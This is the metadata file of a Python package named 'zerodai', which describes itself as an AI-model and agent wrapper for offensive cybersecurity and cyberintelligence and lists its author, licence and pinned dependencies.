Metadata-Version: 2.1
Name: zerodai
Version: 0.0.0.14
Summary: AI Models and Agent Structures Wrapper for particularly offensive cybersecurity and cyberintelligence by 0dAI Company
Home-page: https://github.com/luijait
Author: 0dAI
Author-email: luijait@zerodai.com
License: MIT
Platform: UNKNOWN
Requires-Dist: beautifulsoup4 (==4.12.3)
Requires-Dist: google (==3.0.0)
Requires-Dist: googlesearch-python (==1.2.4)
Requires-Dist: openai (==0.28.0)
Requires-Dist: requests (==2.32.3)
